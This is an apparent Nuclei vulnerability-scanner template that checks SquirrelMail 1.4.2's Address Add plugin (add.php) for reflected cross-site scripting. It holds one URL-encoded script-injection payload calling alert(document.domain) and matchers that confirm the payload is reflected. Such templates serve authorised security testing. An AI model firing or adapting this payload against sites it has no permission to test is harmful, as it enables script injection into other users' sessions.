id: squirrelmail-address-xss

info:
  name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
  reference: https://www.exploit-db.com/exploits/26305
  tags: xss,squirrelmail,plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"
